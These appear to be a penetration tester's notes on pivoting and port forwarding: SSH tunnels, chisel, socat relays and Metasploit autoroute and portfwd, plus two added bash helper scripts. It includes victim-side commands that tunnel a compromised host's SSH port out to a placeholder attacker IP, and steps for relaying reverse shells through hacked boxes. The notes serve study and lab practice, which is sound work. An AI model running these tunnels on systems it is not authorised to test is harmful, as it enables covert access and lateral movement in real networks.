# Port Forwarding

## SSH

### Locally

Example: we want to reach port 1025 on the remote machine "delivery" through port 1337 on our own machine.

```
ssh -L 1337:localhost:1025 maildeliverer@delivery
```

Example: we want to reach port 1025 on the machine "pivotable" through the machine "delivery", on port 1337 on our own machine (the name "pivotable" is resolved by "delivery", not by us).

```
ssh -L 1337:pivotable:1025 maildeliverer@delivery
```

### Remotely

Example: run from the victim, this SSHes to my kali and makes port 1025 on the victim's localhost reachable at port 1337 on kali.

```
ssh -R 1337:localhost:1025 kali@mykali
```

### Dynamically

This creates a SOCKS proxy on your machine that lets you reach IP addresses in the same network as a box you can SSH to.

Run the following commands on your machine to create a SOCKS proxy:

```
ssh -D 1080 username@box -N
```

Then, on your machine, make sure `/etc/proxychains.conf` has:

```
socks5 127.0.0.1 1080
```

Then you can put the `proxychains` command in front of your other commands to proxy them through the SSH box. For example, this command curls the IP address 192.168.122.4 through that box:

```
proxychains4 curl 192.168.122.4
```

To use it with Burp, go to "User Options", select "Use SOCKS proxy", and point it at localhost on port 1080.

*Note: SOCKS proxies carry TCP traffic (and UDP with SOCKS5), but not ICMP, so you can't ping through a proxy. OpenSSH's `-D` proxy in particular only supports TCP connections.*

*Note: Firefox and Chromium didn't seem to work with proxychains. It might be possible to specify a SOCKS proxy in the browser settings, though.*

### Two Hops

This section explains how to forward a reverse shell from a second hacked box, through a first hacked box, to kali.

Run the following in the SSH session to the first hacked machine (`~C` is ssh's escape to its own command line and must be typed at the start of a line):

```
# in an ssh session:
~C

# first part (bind address and port) is on the hacked machine
# second part is on kali
-R 127.0.0.1:9001:127.0.0.1:9001
```

**Question:** Why can't we just specify the private IP address in the above command instead of 127.0.0.1? In that case we wouldn't have to redirect with socat later on. (The ssh(1) manual gives the reason: a non-loopback bind address in `-R` only takes effect if the sshd on the listening side has `GatewayPorts` enabled; by default sshd binds remote forwards to loopback only, and changing that needs control over the sshd configuration.)

You can confirm whether it worked by running:

```
netstat -alnp | grep 9001
```

This sends everything that arrives on the hacked machine's localhost:9001 to kali:9001. However, **it does not accept anything on the hacked machine's private IP address**, so a second box cannot connect to it yet.

You can use socat on the first hacked machine to redirect traffic arriving on its private IP address to its localhost, from where it is forwarded on to kali.

In this example, the first hacked box's IP address is 192.168.122.1:

```
socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 &
```

After you have set that up, you can run a reverse shell on the second hacked machine and have it connect to port 9001 on the first hacked machine. That connection will be forwarded to port 9001 on your kali. **Don't forget to run a listener on port 9001** in kali to catch the connection.
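To interpret the `netstat` check above, here is an added bash helper (not from the original page): it reads `ss -ltn`-style output and reports whether a port is bound only to loopback (what `-R` gives by default) or also to an address other hosts can reach (what the socat redirect adds). The socket lines it runs on are constructed.

```bash
#!/usr/bin/env bash
# Added helper (not part of the original page). Feed it `ss -ltn` (or
# `netstat -ltn`) output and a port; it lists the local addresses that port is
# bound to and classifies their reachability. Sample lines are constructed.
listener_binds() {
    local port="$1" ssout="$2"
    printf '%s\n' "$ssout" | while read -r state recvq sendq local_addr rest; do
        [ "$state" = "LISTEN" ] || continue            # skips the header line
        [ "${local_addr##*:}" = "$port" ] || continue  # port sits after the last colon
        printf '%s\n' "${local_addr%:*}"               # address is what precedes it ([::1] too)
    done
}

# "none": nothing listens on the port; "loopback-only": every bind is
# 127.0.0.0/8 or [::1], so only local processes can reach it (an ssh -R
# listener by default); "exposed": at least one bind (a NIC address, 0.0.0.0,
# * or [::]) is reachable from the network, as after the socat redirect.
listener_scope() {
    local binds
    binds=$(listener_binds "$1" "$2")
    if [ -z "$binds" ]; then
        echo none
    elif printf '%s\n' "$binds" | grep -Eqv '^(127\.|\[::1\]$)'; then
        echo exposed
    else
        echo loopback-only
    fi
}

# Constructed ss -ltn output: before the socat redirect only the ssh -R
# listener on loopback exists ...
BEFORE='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      128    127.0.0.1:9001      0.0.0.0:*
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*'
# ... and afterwards socat also listens on the box's private address.
AFTER="$BEFORE
LISTEN 0      128    192.168.122.1:9001  0.0.0.0:*"

listener_scope 9001 "$BEFORE"   # loopback-only: a second box cannot connect yet
listener_scope 9001 "$AFTER"    # exposed: port 9001 is now reachable on 192.168.122.1
```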

## Chisel

This makes port 4505 on the target's localhost reachable as port 4505 on your own machine:

```
# Run on kali
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse

# Run on target machine
./chisel_1.7.6_linux_amd64 client YOUR_IP_ADDRESS:12312 R:4505:127.0.0.1:4505
```

## Socat

### Same Machine Redirection

You can use socat to redirect a port to another port on the same machine.

For example, this command redirects port 9001 on the IP address 192.168.122.1 to localhost:9001 **on that same machine**:

```
socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 &
```

### Access Remote Port Through Local Port

{% embed url="https://book.hacktricks.xyz/tunneling-and-port-forwarding#remote-port-2-port" %}

**Warning**: For some strange reason, when I used this to forward a web port, then I was able to do curl requests to this, but not gobuster or wfuzz.

```
# On attacker's machine
# Listen on 443 (for the victim) and on 2222 (for us), and join the two connections
sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr

# On victim machine
# Connect out to the attacker's port 443 and relay whatever arrives to local port 22;
# loop so a fresh connection is made after each session ends
while true; do socat TCP4:ATTACKER_IP_ADDRESS_HERE:443 TCP4:127.0.0.1:22 ; done
```

After the above, your local port 2222 leads to the victim's port 22, so you can SSH to the victim like this:

```
ssh localhost -p 2222
```

## Meterpreter Autorouting

{% embed url="https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html" %}
Autoroute documentation
{% endembed %}

Use autoroute to route traffic to a specific host through an existing session automatically.

Set up a SOCKS proxy:

```
use auxiliary/server/socks_proxy
run
```

Then set up proxychains by editing `/etc/proxychains.conf`. Add the socks5 proxy line under `[ProxyList]` (if there is already a `[ProxyList]` section, add the line under it):

```
[ProxyList]
socks5 127.0.0.1 1080
```
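The proxychains edit described here and in the Dynamically section above, as an added bash helper (not from the original page or from proxychains): it adds `socks5 127.0.0.1 1080` under an existing `[ProxyList]` or appends the section, never duplicates the line, and lists the active entries so a leftover default such as the Tor line does not go unnoticed. The demo config is constructed.

```bash
#!/usr/bin/env bash
# Added helper (not part of the original page): idempotently put a
# "socks5 HOST PORT" entry under [ProxyList] in a proxychains config and
# report what was done ("present", "inserted" or "appended").
ensure_proxychains_socks5() {
    local conf="$1" host="${2:-127.0.0.1}" port="${3:-1080}"
    local line="socks5 $host $port" host_re
    host_re=$(printf '%s' "$host" | sed 's/\./\\./g')   # escape dots for grep -E

    # Already configured (tolerating extra whitespace)? Leave the file alone.
    if grep -Eq "^[[:space:]]*socks5[[:space:]]+${host_re}[[:space:]]+${port}([[:space:]]|$)" "$conf"; then
        echo present
        return 0
    fi

    if grep -q '^\[ProxyList\]' "$conf"; then
        # Section exists: insert directly under its header so it comes first in the chain.
        awk -v l="$line" '{ print } /^\[ProxyList\]/ { print l }' "$conf" > "$conf.tmp" \
            && mv "$conf.tmp" "$conf"
        echo inserted
    else
        # No section yet: append one, as the page's snippet shows.
        printf '\n[ProxyList]\n%s\n' "$line" >> "$conf"
        echo appended
    fi
}

# Active (non-comment) entries in [ProxyList]. In strict_chain mode proxychains
# uses every one of them in order, so a stale default such as the Tor
# "socks4 127.0.0.1 9050" line would silently break the chain.
proxylist_entries() {
    awk '/^\[ProxyList\]/ { inlist = 1; next }
         /^\[/            { inlist = 0 }
         inlist && /^[ \t]*(socks4|socks5|http)[ \t]/ { print }' "$1"
}

# Demo on a constructed config resembling the stock Kali file.
demo_conf=$(mktemp)
printf 'strict_chain\nproxy_dns\n[ProxyList]\nsocks4 127.0.0.1 9050\n' > "$demo_conf"
ensure_proxychains_socks5 "$demo_conf" 127.0.0.1 1080   # inserted
ensure_proxychains_socks5 "$demo_conf" 127.0.0.1 1080   # present (second run changes nothing)
proxylist_entries "$demo_conf"                          # two entries: the Tor line is still active
rm -f "$demo_conf"
```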

In Metasploit, set up autorouting:

```
use multi/manage/autoroute
set cmd autoadd
set session SESSION_NUMBER_HERE # Has to be meterpreter I think
set subnet NETWORK_IP_ADDRESS_HERE
set netmask NETMASK_HERE
run
```

After that is done, you can run Metasploit modules against the selected host, for example `scanner/portscan/tcp` (the SOCKS proxy was not actually needed for this).

To reach hosts in the chosen subnet with non-Metasploit tools such as nmap, use proxychains. For example, if you chose the subnet 172.17.0.0 and want to scan the host at 172.17.0.1:

```
proxychains -q nmap -A -v 172.17.0.1
```

**Warning: I didn't actually get the proxychains part to work on the OpenSource HTB machine, unfortunately.**

## Meterpreter Port Forwarding

`portfwd` is the meterpreter command for port forwarding.

{% embed url="https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html#portfwd" %}
Portfwd section of metasploit docs
{% endembed %}

From meterpreter shell:

```
portfwd add -l 3000 -p 3000 -r 172.0.0.1
```

* `-l`: local port to listen on
* `-p`: remote port to connect to
* `-r`: remote IP address to connect to

## Pivoting Cheat Sheet

In-depth guide on different scenarios (ssh, reverse, tunnelling, etc):

<https://artkond.com/2017/03/23/pivoting-guide/>

